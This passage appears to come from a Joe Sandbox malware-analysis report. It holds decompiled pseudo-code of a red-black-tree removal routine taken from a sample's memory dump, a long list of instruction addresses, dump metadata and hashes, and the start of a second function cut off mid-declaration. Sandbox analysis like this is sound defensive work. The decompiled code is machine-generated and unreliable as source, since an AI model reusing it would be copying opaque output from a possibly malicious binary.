															if(_t306 != 0) {
																_t306 = _t306 ^ _t426;
															}
														}
														if(_t306 != _t419) {
															goto L174;
														} else {
															if(_v6 != 0) {
																if(_t422 != 0) {
																	_t422 = _t422 ^ _t426;
																}
															}
															 *(_t426 + 8) = _t422;
															L24:
															return _t306;
														}
													}
													if(_v5 != _t426) {
														goto L24;
													} else {
														_t395 = _t452;
														_t306 =  *(_t395 + 4);
														L17:
														_t446 = _t423;
														_t434 = _v16 ^ 0x00000001;
														_v24 = _t446;
														_v12 = _t434;
														_t452 =  *(_t423 + _t434 * 4);
														if((_t306 & 0x00000001) != 0) {
															if(_t452 == 0) {
																goto L18;
															}
															_t426 = _t452 ^ _t446;
															L19:
															if(( *(_t426 + 8) & 0x00000001) != 0) {
																_t310 =  *(_t426 + 8) & 0xfffffffc;
																_t444 = _t306 & 1;
																if(_t444 != 0) {
																	if(_t310 != 0) {
																		_t310 = _t310 ^ _t426;
																	}
																}
																if(_t310 != _t423) {
																	goto L174;
																} else {
																	if(_t444 != 0) {
																		if(_t452 != 0) {
																			_t452 = _t452 ^ _t423;
																		}
																	}
																	if(_t452 != _t426) {
																		goto L174;
																	} else {
																		_t452 =  *(_t423 + 8) & 0xfffffffc;
																		if(_t444 != 0) {
																			if(_t452 == 0) {
																				L170:
																				if( *_t395 != _t423) {
																					goto L174;
																				} else {
																					 *_t395 = _t426;
																					L140:
																					if(_t444 != 0) {
																						if(_t452 != 0) {
																							_t452 = _t452 ^ _t426;
																						}
																					}
																					 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t452;
																					_t300 =  *(_t426 + _v16 * 4);
																					if(_t444 != 0) {
																						if(_t300 == 0) {
																							goto L143;
																						}
																						_t300 = _t300 ^ _t426;
																						goto L142;
																					} else {
																						L142:
																						if(_t300 != 0) {
																							_t401 =  *(_t300 + 8);
																							_t452 = _t401 & 0xfffffffc;
																							if(_t444 != 0) {
																								if(_t452 != 0) {
																									_t452 = _t452 ^ _t300;
																								}
																							}
																							if(_t452 != _t426) {
																								goto L174;
																							} else {
																								if(_t444 != 0) {
																									_t481 = _t300 ^ _t423;
																								} else {
																									_t481 = _t423;
																								}
																								 *(_t300 + 8) = _t401 & 0x00000003 | _t481;
																								goto L143;
																							}
																						}
																						L143:
																						if(_t444 != 0) {
																							if(_t300 != 0) {
																								_t300 = _t300 ^ _t423;
																							}
																						}
																						 *(_t423 + _v12 * 4) = _t300;
																						_t454 = _t426;
																						if(_t444 != 0) {
																							_t455 = _t454 ^ _t423;
																							_t301 = _t455;
																						} else {
																							_t301 = _t423;
																							_t455 = _t454 ^ _t301;
																						}
																						 *(_t426 + _v16 * 4) = _t301;
																						_t395 = _a4;
																						if(_t444 == 0) {
																							_t455 = _t426;
																						}
																						 *(_t423 + 8) =  *(_t423 + 8) & 0x00000003 | _t455;
																						 *(_t426 + 8) =  *(_t426 + 8) & 0x000000fe;
																						 *(_t423 + 8) =  *(_t423 + 8) | 0x00000001;
																						_t426 =  *(_t423 + _v12 * 4);
																						_t306 =  *(_t395 + 4);
																						if((_t306 & 0x00000001) != 0) {
																							if(_t426 != 0) {
																								_t426 = _t426 ^ _t423;
																							}
																						}
																						_t446 = _v24;
																						goto L20;
																					}
																				}
																			}
																			_t452 = _t452 ^ _t423;
																		}
																		if(_t452 == 0) {
																			goto L170;
																		}
																		_t311 =  *(_t452 + 4);
																		if(_t444 != 0) {
																			if(_t311 != 0) {
																				_t311 = _t311 ^ _t452;
																			}
																		}
																		if(_t311 == _t423) {
																			if(_t444 != 0) {
																				L175:
																				_t295 = _t452 ^ _t426;
																				goto L169;
																			} else {
																				_t295 = _t426;
																				L169:
																				 *(_t452 + 4) = _t295;
																				goto L140;
																			}
																		} else {
																			_t312 =  *_t452;
																			if(_t444 != 0) {
																				if(_t312 != 0) {
																					_t312 = _t312 ^ _t452;
																				}
																			}
																			if(_t312 != _t423) {
																				goto L174;
																			} else {
																				if(_t444 != 0) {
																					_t314 = _t452 ^ _t426;
																				} else {
																					_t314 = _t426;
																				}
																				 *_t452 = _t314;
																				goto L140;
																			}
																		}
																	}
																}
															}
															L20:
															_t456 =  *_t426;
															_t307 = _t306 & 0x00000001;
															if(_t456 != 0) {
																if(_t307 != 0) {
																	_t456 = _t456 ^ _t426;
																}
																if(( *(_t456 + 8) & 0x00000001) == 0) {
																	goto L21;
																} else {
																	L56:
																	_t461 =  *(_t426 + _v12 * 4);
																	if(_t307 != 0) {
																		if(_t461 == 0) {
																			L59:
																			_t462 = _v16;
																			_t444 =  *(_t426 + _t462 * 4);
																			if(_t307 != 0) {
																				if(_t444 != 0) {
																					_t444 = _t444 ^ _t426;
																				}
																			}
																			 *(_t444 + 8) =  *(_t444 + 8) & 0x000000fe;
																			_t452 = _t462 ^ 0x00000001;
																			_t405 =  *(_t395 + 4) & 1;
																			_t316 =  *(_t444 + 8) & 0xfffffffc;
																			_v28 = _t405;
																			_v24 = _t452;
																			if(_t405 != 0) {
																				if(_t316 != 0) {
																					_t316 = _t316 ^ _t444;
																				}
																			}
																			if(_t316 != _t426) {
																				goto L174;
																			} else {
																				_t318 = _t452 ^ 0x00000001;
																				_v32 = _t318;
																				_t319 =  *(_t426 + _t318 * 4);
																				if(_t405 != 0) {
																					if(_t319 != 0) {
																						_t319 = _t319 ^ _t426;
																					}
																				}
																				if(_t319 != _t444) {
																					goto L174;
																				} else {
																					_t320 =  *(_t423 + _t452 * 4);
																					if(_t405 != 0) {
																						if(_t320 != 0) {
																							_t320 = _t320 ^ _t423;
																						}
																					}
																					if(_t320 != _t426) {
																						goto L174;
																					} else {
																						_t322 =  *(_t426 + 8) & 0xfffffffc;
																						if(_t405 != 0) {
																							if(_t322 != 0) {
																								_t322 = _t322 ^ _t426;
																							}
																						}
																						if(_t322 != _t423) {
																							goto L174;
																						} else {
																							_t464 = _t423 ^ _t444;
																							_t323 = _t464;
																							if(_t405 == 0) {
																								_t323 = _t444;
																							}
																							 *(_t423 + _v24 * 4) = _t323;
																							_t407 = _v28;
																							if(_t407 != 0) {
																								if(_t423 != 0) {
																									L72:
																									 *(_t444 + 8) =  *(_t444 + 8) & 0x00000003 | _t464;
																									_t328 =  *(_t444 + _v24 * 4);
																									if(_t407 != 0) {
																										if(_t328 == 0) {
																											L74:
																											if(_t407 != 0) {
																												if(_t328 != 0) {
																													_t328 = _t328 ^ _t426;
																												}
																											}
																											 *(_t426 + _v32 * 4) = _t328;
																											_t467 = _t426 ^ _t444;
																											_t329 = _t467;
																											if(_t407 == 0) {
																												_t329 = _t426;
																											}
																											 *(_t444 + _v24 * 4) = _t329;
																											if(_v28 == 0) {
																												_t467 = _t444;
																											}
																											_t395 = _a4;
																											_t452 = _t426;
																											 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t467;
																											_t426 = _t444;
																											L80:
																											 *(_t426 + 8) =  *(_t426 + 8) ^ ( *(_t426 + 8) ^  *(_t423 + 8)) & 0x00000001;
																											 *(_t423 + 8) =  *(_t423 + 8) & 0x000000fe;
																											 *(_t452 + 8) =  *(_t452 + 8) & 0x000000fe;
																											_t337 =  *(_t426 + 8) & 0xfffffffc;
																											_t444 =  *(_t395 + 4) & 1;
																											if(_t444 != 0) {
																												if(_t337 != 0) {
																													_t337 = _t337 ^ _t426;
																												}
																											}
																											if(_t337 != _t423) {
																												goto L174;
																											} else {
																												_t339 =  *(_t423 + _v12 * 4);
																												if(_t444 != 0) {
																													if(_t339 != 0) {
																														_t339 = _t339 ^ _t423;
																													}
																												}
																												if(_t339 != _t426) {
																													goto L174;
																												} else {
																													_t452 =  *(_t423 + 8) & 0xfffffffc;
																													if(_t444 != 0) {
																														if(_t452 == 0) {
																															L160:
																															if( *_t395 != _t423) {
																																goto L174;
																															} else {
																																 *_t395 = _t426;
																																L93:
																																if(_t444 != 0) {
																																	if(_t452 != 0) {
																																		_t452 = _t452 ^ _t426;
																																	}
																																}
																																_t409 = _v16;
																																 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t452;
																																_t343 =  *(_t426 + _t409 * 4);
																																if(_t444 != 0) {
																																	if(_t343 == 0) {
																																		goto L96;
																																	}
																																	_t343 = _t343 ^ _t426;
																																	goto L95;
																																} else {
																																	L95:
																																	if(_t343 != 0) {
																																		_t410 =  *(_t343 + 8);
																																		_t452 = _t410 & 0xfffffffc;
																																		if(_t444 != 0) {
																																			if(_t452 != 0) {
																																				_t452 = _t452 ^ _t343;
																																			}
																																		}
																																		if(_t452 != _t426) {
																																			goto L174;
																																		} else {
																																			if(_t444 != 0) {
																																				_t474 = _t343 ^ _t423;
																																			} else {
																																				_t474 = _t423;
																																			}
																																			 *(_t343 + 8) = _t410 & 0x00000003 | _t474;
																																			_t409 = _v16;
																																			goto L96;
																																		}
																																	}
																																	L96:
																																	if(_t444 != 0) {
																																		if(_t343 != 0) {
																																			_t343 = _t343 ^ _t423;
																																		}
																																	}
																																	 *(_t423 + _v12 * 4) = _t343;
																																	if(_t444 != 0) {
																																		_t345 = _t426 ^ _t423;
																																		_t470 = _t345;
																																	} else {
																																		_t345 = _t423;
																																		_t470 = _t426 ^ _t345;
																																	}
																																	 *(_t426 + _t409 * 4) = _t345;
																																	if(_t444 == 0) {
																																		_t470 = _t426;
																																	}
																																	_t306 =  *(_t423 + 8) & 0x00000003 | _t470;
																																	 *(_t423 + 8) = _t306;
																																	goto L24;
																																}
																															}
																														}
																														_t452 = _t452 ^ _t423;
																													}
																													if(_t452 == 0) {
																														goto L160;
																													}
																													_t348 =  *(_t452 + 4);
																													if(_t444 != 0) {
																														if(_t348 != 0) {
																															_t348 = _t348 ^ _t452;
																														}
																													}
																													if(_t348 == _t423) {
																														if(_t444 != 0) {
																															_t350 = _t452 ^ _t426;
																														} else {
																															_t350 = _t426;
																														}
																														 *(_t452 + 4) = _t350;
																														goto L93;
																													} else {
																														_t351 =  *_t452;
																														if(_t444 != 0) {
																															if(_t351 != 0) {
																																_t351 = _t351 ^ _t452;
																															}
																														}
																														if(_t351 != _t423) {
																															goto L174;
																														} else {
																															if(_t444 != 0) {
																																_t353 = _t452 ^ _t426;
																															} else {
																																_t353 = _t426;
																															}
																															 *_t452 = _t353;
																															goto L93;
																														}
																													}
																												}
																											}
																										}
																										_t328 = _t328 ^ _t444;
																									}
																									if(_t328 != 0) {
																										_t475 =  *(_t328 + 8);
																										_v20 = _t475;
																										_t452 = _t475 & 0xfffffffc;
																										if(_t407 != 0) {
																											if(_t452 != 0) {
																												_t452 = _t452 ^ _t328;
																											}
																										}
																										if(_t452 != _t444) {
																											goto L174;
																										} else {
																											if(_t407 != 0) {
																												_t477 = _t328 ^ _t426;
																											} else {
																												_t477 = _t426;
																											}
																											_v20 = _v20 & 0x00000003;
																											_v20 = _v20 | _t477;
																											 *(_t328 + 8) = _v20;
																											goto L74;
																										}
																									}
																									goto L74;
																								}
																							}
																							_t464 = _t423;
																							goto L72;
																						}
																					}
																				}
																			}
																		}
																		_t452 = _t461 ^ _t426;
																	}
																	if(_t452 == 0 || ( *(_t452 + 8) & 0x00000001) == 0) {
																		goto L59;
																	} else {
																		goto L80;
																	}
																}
															}
															L21:
															_t457 =  *(_t426 + 4);
															if(_t457 != 0) {
																if(_t307 != 0) {
																	_t457 = _t457 ^ _t426;
																}
																if(( *(_t457 + 8) & 0x00000001) == 0) {
																	goto L22;
																} else {
																	goto L56;
																}
															}
															L22:
															_t308 =  *(_t423 + 8);
															if((_t308 & 0x00000001) == 0) {
																 *(_t426 + 8) =  *(_t426 + 8) | 0x00000001;
																_t306 =  *(_t395 + 4);
																_t431 =  *(_t423 + 8) & 0xfffffffc;
																_t397 = _t306 & 0x00000001;
																if(_t397 != 0) {
																	if(_t431 == 0) {
																		goto L110;
																	}
																	_t423 = _t423 ^ _t431;
																	L111:
																	if(_t423 == 0) {
																		goto L24;
																	}
																	_t432 =  *(_t423 + 4);
																	if(_t397 != 0) {
																		if(_t432 != 0) {
																			_t432 = _t432 ^ _t423;
																		}
																	}
																	_v16 = 0 | _t432 == _t446;
																	_t395 = _a4;
																	goto L17;
																}
																L110:
																_t423 = _t431;
																goto L111;
															} else {
																_t306 = _t308 & 0x000000fe;
																 *(_t423 + 8) = _t306;
																 *(_t426 + 8) =  *(_t426 + 8) | 0x00000001;
																goto L24;
															}
														}
														L18:
														_t426 = _t452;
														goto L19;
													}
												}
												L13:
												_t306 = _t426;
												goto L14;
											}
										}
									}
									L41:
									_t366 = _v12;
									_v20 = _t452;
									goto L42;
								}
								L37:
								_t483 = _v24;
								goto L38;
							}
						}
					}
					L28:
					_t428 = _t452;
					goto L29;
				}
				_t385 = _v5;
				_t422 =  *(_t444 + 8) & 0xfffffffc;
				if(_t385 != 0) {
					if(_t422 != 0) {
						_t422 = _t422 ^ _t444;
					}
				}
				_v12 = _t444;
				if(_t422 == 0) {
					if(_t426 != 0) {
						 *(_t426 + 8) =  *(_t426 + 8) & 0x00000000;
					}
					_t425 = _a4;
					if( *_t425 != _t444) {
						goto L174;
					} else {
						_t425[4] = _t426;
						_t306 = _t425[4] & 0x00000001;
						if(_t306 != 0) {
							_t425[4] = _t425[4] | 0x00000001;
						}
						 *_t425 = _t426;
						goto L24;
					}
				} else {
					_t452 =  *(_t422 + 4);
					if(_t385 != 0) {
						if(_t452 != 0) {
							_t452 = _t452 ^ _t422;
						}
					}
					if(_t452 == _t444) {
						_v16 = 1;
						L11:
						_t373 =  *(_t444 + 8);
						goto L12;
					} else {
						_t387 =  *_t422;
						if(_v5 != 0) {
							if(_t387 != 0) {
								_t387 = _t387 ^ _t422;
							}
						}
						if(_t387 != _t444) {
							goto L174;
						} else {
							_t488 = _a4;
							_v16 = _v16 & 0x00000000;
							_t388 =  *(_t488 + 4);
							_v24 = _t388;
							if((_t388 & 0xfffffffe) == _t444) {
								if(_t426 != 0) {
									 *(_t488 + 4) = _t426;
									if((_v24 & 0x00000001) != 0) {
										_t390 = _t426;
										L228:
										 *(_t488 + 4) = _t390 | 0x00000001;
									}
									goto L11;
								}
								 *(_t488 + 4) = _t422;
								if((_v24 & 0x00000001) == 0) {
									goto L11;
								} else {
									_t390 = _t422;
									goto L228;
								}
							}
							goto L11;
						}
					}
				}
			}

0x0171f90b
0x0171f911
0x0171f917
0x0171f919
0x0171f91c
0x01775d63
0x01775d69
0x01775d69
0x01775d63
0x0171f922
0x0171f927
0x01775d72
0x01775d78
0x01775d78
0x01775d72
0x0171f92d
0x0171f931
0x0171fa2d
0x0171fa2d
0x0171f939
0x0171f940
0x0171f944
0x0171fa37
0x0171fa39
0x0171fa3c
0x0171fa3e
0x0171fa41
0x0171fa48
0x0171fe68
0x0171fe6c
0x0171fe6c
0x0171fe78
0x0171fe78
0x0171fe7a
0x0171fe7a
0x0171fe7e
0x0171fe6e
0x0171fe6e
0x0171fe72
0x00000000
0x00000000
0x00000000
0x0171fe80
0x0171fe80
0x0171fe83
0x00000000
0x0171fe83
0x01775d7f
0x01775d81
0x00000000
0x00000000
0x01775d87
0x00000000
0x01775d87
0x0171fa4e
0x0171fa50
0x01775d90
0x00000000
0x00000000
0x01775d98
0x0171fa58
0x0171fa58
0x0171fa5d
0x0171fa60
0x0171fa63
0x0171fa69
0x0171fa6b
0x0171fa6e
0x0171fa71
0x01775da1
0x01775da7
0x01775da7
0x01775da1
0x0171fa79
0x01720071
0x01720073
0x01720074
0x00000000
0x0171fa7f
0x0171fa83
0x0171fa85
0x01775dae
0x01775dae
0x0171fa8b
0x0171fa8f
0x0171fa98
0x0171faa1
0x0171faa4
0x0171faa6
0x0171faa9
0x0171faac
0x01775db7
0x01775dbd
0x01775dbd
0x01775db7
0x0171fab4
0x00000000
0x0171faba
0x0171fabc
0x0171fac2
0x0171fac5
0x0171fac7
0x0171fac7
0x0171fad6
0x0171fad9
0x0171fadf
0x0171fae2
0x0171fae4
0x0171fae7
0x0171faea
0x0171faed
0x01775dc4
0x01775dc9
0x00000000
0x00000000
0x01775dcf
0x0171faf6
0x0171fafa
0x0171fafc
0x0171fafc
0x0171fafe
0x0171fb01
0x0171fb09
0x0171fb0c
0x0171fb12
0x0171fb14
0x0171fb17
0x01775dd6
0x01775dd9
0x01775dde
0x00000000
0x00000000
0x01775de4
0x01775de7
0x0171fb29
0x0171fb2c
0x01775df3
0x01775df6
0x01775e06
0x01775e0c
0x01775e0f
0x01775e11
0x00000000
0x01775e1f
0x00000000
0x01775e1f
0x01775e11
0x01775df8
0x01775dfb
0x01775e00
0x00000000
0x00000000
0x01775e02
0x00000000
0x01775e02
0x0171fb32
0x0171fb35
0x0171fb3c
0x01775e26
0x01775e28
0x01775e28
0x01775e2e
0x01775e3c
0x01775e3c
0x01775e2e
0x0171fb45
0x0171fb47
0x0171fb53
0x0171fb56
0x0171fb59
0x0171fb5c
0x0171fb65
0x0172000d
0x00000000
0x0172000f
0x0172000f
0x00000000
0x0172000f
0x0171fb6b
0x0171fb6e
0x0171fb71
0x0171fb73
0x0171fb76
0x01775e45
0x01775e4b
0x01775e4b
0x01775e45
0x0171fb80
0x0171fb83
0x01775e54
0x01775e5a
0x01775e5a
0x01775e54
0x0171fb89
0x0171fb98
0x0171fb9b
0x0171fb9e
0x0171fba0
0x01775e63
0x01775e69
0x01775e69
0x01775e63
0x0171fba8
0x00000000
0x0171fbae
0x0171fbb2
0x01775e70
0x0171fbb8
0x0171fbb8
0x0171fbb8
0x0171fbbd
0x0171fbbf
0x0171fbbf
0x0171f9a8
0x0171f9a8
0x0171f9ad
0x0171f9b4
0x01775eda
0x00000000
0x00000000
0x01775ee2
0x0171f9bc
0x0171f9bc
0x0171f9bf
0x0171f9c4
0x0171fde6
0x0171fde9
0x0171fdec
0x0171fdef
0x0171fdf2
0x01775eeb
0x01775ef1
0x01775ef1
0x01775eeb
0x0171fdfa
0x00000000
0x0171fe00
0x0171fe04
0x01775efa
0x01775f00
0x01775f00
0x01775efa
0x0171fe0a
0x0171fa24
0x0171fa2a
0x0171fa2a
0x0171fdfa
0x0171f9cd
0x00000000
0x0171f9cf
0x0171f9cf
0x0171f9d1
0x0171f9d4
0x0171f9d7
0x0171f9d9
0x0171f9dc
0x0171f9df
0x0171f9e2
0x0171f9e7
0x01775f09
0x00000000
0x00000000
0x01775f11
0x0171f9ef
0x0171f9f3
0x0171fed5
0x0171fed8
0x0171fedb
0x01775f1a
0x01775f20
0x01775f20
0x01775f1a
0x0171fee3
0x00000000
0x0171fee9
0x0171feeb
0x01775f29
0x01775f2f
0x01775f2f
0x01775f29
0x0171fef3
0x00000000
0x0171fef9
0x0171fefc
0x0171ff01
0x01775f38
0x01720052
0x01720054
0x00000000
0x01720056
0x01720056
0x0171ff40
0x0171ff42
0x01775f6e
0x01775f74
0x01775f74
0x01775f6e
0x0171ff50
0x0171ff56
0x0171ff5b
0x01775f7d
0x00000000
0x00000000
0x01775f83
0x00000000
0x0171ff61
0x0171ff61
0x0171ff63
0x01720021
0x01720026
0x0172002b
0x0172007e
0x01720080
0x01720080
0x0172007e
0x0172002f
0x00000000
0x01720031
0x01720033
0x01720086
0x01720035
0x01720035
0x01720035
0x0172003c
0x00000000
0x0172003c
0x0172002f
0x0171ff69
0x0171ff6b
0x01775f8c
0x01775f92
0x01775f92
0x01775f8c
0x0171ff74
0x0171ff77
0x0171ff7b
0x01775f99
0x01775f9b
0x0171ff81
0x0171ff81
0x0171ff83
0x0171ff83
0x0171ff88
0x0171ff8b
0x0171ff90
0x0171ff92
0x0171ff92
0x0171ff9c
0x0171ffa2
0x0171ffa6
0x0171ffaa
0x0171ffad
0x0171ffb2
0x01775fa4
0x01775faa
0x01775faa
0x01775fa4
0x0171ffb8
0x00000000
0x0171ffb8
0x0171ff5b
0x01720054
0x01775f3e
0x01775f3e
0x0171ff09
0x00000000
0x00000000
0x0171ff0f
0x0171ff14
0x01775f47
0x01775f4d
0x01775f4d
0x01775f47
0x0171ff1c
0x01720046
0x01720076
0x01720078
0x00000000
0x01720048
0x01720048
0x0172004a
0x0172004a
0x00000000
0x0172004a
0x0171ff22
0x0171ff22
0x0171ff26
0x01775f56
0x01775f5c
0x01775f5c
0x01775f56
0x0171ff2e
0x00000000
0x0171ff34
0x0171ff36
0x01775f65
0x0171ff3c
0x0171ff3c
0x0171ff3c
0x0171ff3e
0x00000000
0x0171ff3e
0x0171ff2e
0x0171ff1c
0x0171fef3
0x0171fee3
0x0171f9f9
0x0171f9f9
0x0171f9fb
0x0171f9ff
0x0171fbd5
0x01775fb1
0x01775fb1
0x0171fbdf
0x00000000
0x0171fbe5
0x0171fbe5
0x0171fbe8
0x0171fbed
0x01775fdf
0x0171fc01
0x0171fc01
0x0171fc04
0x0171fc09
0x01775fee
0x01775ff4
0x01775ff4
0x01775fee
0x0171fc0f
0x0171fc13
0x0171fc1d
0x0171fc20
0x0171fc23
0x0171fc26
0x0171fc2b
0x01775ffd
0x01776003
0x01776003
0x01775ffd
0x0171fc33
0x00000000
0x0171fc39
0x0171fc3b
0x0171fc3e
0x0171fc41
0x0171fc46
0x0177600c
0x01776012
0x01776012
0x0177600c
0x0171fc4e
0x00000000
0x0171fc54
0x0171fc54
0x0171fc59
0x0177601b
0x01776021
0x01776021
0x0177601b
0x0171fc61
0x00000000
0x0171fc67
0x0171fc6a
0x0171fc6f
0x0177602a
0x01776030
0x01776030
0x0177602a
0x0171fc77
0x00000000
0x0171fc7d
0x0171fc7f
0x0171fc81
0x0171fc85
0x0171fc87
0x0171fc87
0x0171fc8c
0x0171fc8f
0x0171fc94
0x01776039
0x0171fc9c
0x0171fca4
0x0171fcaa
0x0171fcaf
0x01776046
0x0171fcbd
0x0171fcbf
0x0177606d
0x01776073
0x01776073
0x0177606d
0x0171fcc8
0x0171fccd
0x0171fccf
0x0171fcd3
0x0171fcd5
0x0171fcd5
0x0171fcde
0x0171fce1
0x0171fce3
0x0171fce3
0x0171fce8
0x0171fcf0
0x0171fcf2
0x0171fcf5
0x0171fcf7
0x0171fcff
0x0171fd02
0x0171fd06
0x0171fd11
0x0171fd14
0x0171fd17
0x0177607c
0x01776082
0x01776082
0x0177607c
0x0171fd1f
0x00000000
0x0171fd25
0x0171fd28
0x0171fd2d
0x0177608b
0x01776091
0x01776091
0x0177608b
0x0171fd35
0x00000000
0x0171fd3b
0x0171fd3e
0x0171fd43
0x0177609a
0x01720016
0x01720018
0x00000000
0x0172001a
0x0172001a
0x0171fd82
0x0171fd84
0x017760d9
0x017760df
0x017760df
0x017760d9
0x0171fd8d
0x0171fd95
0x0171fd98
0x0171fd9d
0x017760e8
0x00000000
0x00000000
0x017760ee
0x00000000
0x0171fda3
0x0171fda3
0x0171fda5
0x0171fe8b
0x0171fe90
0x0171fe95
0x017760f7
0x017760fd
0x017760fd
0x017760f7
0x0171fe9d
0x00000000
0x0171fea3
0x0171fea5
0x01776106
0x0171feab
0x0171feab
0x0171feab
0x0171feb2
0x0171feb5
0x00000000
0x0171feb5
0x0171fe9d
0x0171fdab
0x0171fdad
0x0177610f
0x01776115
0x01776115
0x0177610f
0x0171fdb6
0x0171fdbb
0x0177611e
0x01776120
0x0171fdc1
0x0171fdc1
0x0171fdc5
0x0171fdc5
0x0171fdc7
0x0171fdcc
0x0171fdce
0x0171fdce
0x0171fdd6
0x0171fdd8
0x00000000
0x0171fdd8
0x0171fd9d
0x01720018
0x017760a0
0x017760a0
0x0171fd4b
0x00000000
0x00000000
0x0171fd51
0x0171fd56
0x017760a9
0x017760af
0x017760af
0x017760a9
0x0171fd5e
0x0171febf
0x017760b8
0x0171fec5
0x0171fec5
0x0171fec5
0x0171fec7
0x00000000
0x0171fd64
0x0171fd64
0x0171fd68
0x017760c1
0x017760c7
0x017760c7
0x017760c1
0x0171fd70
0x00000000
0x0171fd76
0x0171fd78
0x017760d0
0x0171fd7e
0x0171fd7e
0x0171fd7e
0x0171fd80
0x00000000
0x0171fd80
0x0171fd70
0x0171fd5e
0x0171fd35
0x0171fd1f
0x0177604c
0x0177604c
0x0171fcb7
0x0171ffc0
0x0171ffc3
0x0171ffc6
0x0171ffcb
0x01776055
0x0177605b
0x0177605b
0x01776055
0x0171ffd3
0x00000000
0x0171ffd9
0x0171ffdb
0x01776064
0x0171ffe1
0x0171ffe1
0x0171ffe1
0x0171ffe3
0x0171ffe7
0x0171ffed
0x00000000
0x0171ffed
0x0171ffd3
0x00000000
0x0171fcb7
0x0177603f
0x0171fc9a
0x00000000
0x0171fc9a
0x0171fc77
0x0171fc61
0x0171fc4e
0x0171fc33
0x01775fe5
0x01775fe5
0x0171fbf5
0x00000000
0x00000000
0x00000000
0x00000000
0x0171fbf5
0x0171fbdf
0x0171fa05
0x0171fa05
0x0171fa0a
0x0171fe14
0x01775fb8
0x01775fb8
0x0171fe1e
0x00000000
0x0171fe24
0x00000000
0x0171fe24
0x0171fe1e
0x0171fa10
0x0171fa10
0x0171fa15
0x0171fe29
0x0171fe2d
0x0171fe35
0x0171fe38
0x0171fe3b
0x01775fc1
0x00000000
0x00000000
0x01775fc7
0x0171fe43
0x0171fe45
0x00000000
0x00000000
0x0171fe4b
0x0171fe50
0x01775fd0
0x01775fd6
0x01775fd6
0x01775fd0
0x0171fe5d
0x0171fe60
0x00000000
0x0171fe60
0x0171fe41
0x0171fe41
0x00000000
0x0171fa1b
0x0171fa1b
0x0171fa1d
0x0171fa20
0x00000000
0x0171fa20
0x0171fa15
0x0171f9ed
0x0171f9ed
0x00000000
0x0171f9ed
0x0171f9cd
0x0171f9ba
0x0171f9ba
0x00000000
0x0171f9ba
0x0171fba8
0x0171fb65
0x0171fb1d
0x0171fb23
0x0171fb26
0x00000000
0x0171fb26
0x0171faf3
0x0171faf3
0x00000000
0x0171faf3
0x0171fab4
0x0171fa79
0x0171fa56
0x0171fa56
0x00000000
0x0171fa56
0x0171f94d
0x0171f950
0x0171f955
0x01775e79
0x01775e7f
0x01775e7f
0x01775e79
0x0171f95b
0x0171f960
0x01775e88
0x01775e8a
0x01775e8a
0x01775e8e
0x01775e93
0x00000000
0x01775e99
0x01775e9c
0x01775e9f
0x01775ea1
0x01775ea3
0x01775ea3
0x01775ea7
0x00000000
0x01775ea7
0x0171f966
0x0171f966
0x0171f96b
0x01775eb0
0x01775eb6
0x01775eb6
0x01775eb0
0x0171f973
0x0171fbc7
0x0171f9a5
0x0171f9a5
0x00000000
0x0171f979
0x0171f97d
0x0171f97f
0x01775ebf
0x01775ec5
0x01775ec5
0x01775ebf
0x0171f987
0x00000000
0x0171f98d
0x0171f98d
0x0171f990
0x0171f994
0x0171f997
0x0171f99f
0x0171fff7
0x01720061
0x01720064
0x0172006a
0x01775ece
0x01775ed0
0x01775ed0
0x00000000
0x01720064
0x0171fffd
0x01720000
0x00000000
0x01720006
0x01775ecc
0x00000000
0x01775ecc
0x01720000
0x00000000
0x0171f99f
0x0171f987
0x0171f973

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc66cec98a30fadb5342584c4926ef08b8d30d1ee31ce6150576712f1cb138a4
Instruction ID: bcac797913432763413dd45ec5eca83bca35f983d0a446a2094af77efa002f1b
Opcode Fuzzy Hash: fc66cec98a30fadb5342584c4926ef08b8d30d1ee31ce6150576712f1cb138a4
Instruction Fuzzy Hash: 7562E632E046629BEF32CF2C844037AFBB1AF45614F1986A9DC65DB24AD371DD4AC790

Uniqueness

Uniqueness Score: -1.00%

Function 017E5BA5 Relevance: .6, Instructions: 592
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E017E5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x17f1178);
				E0176D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
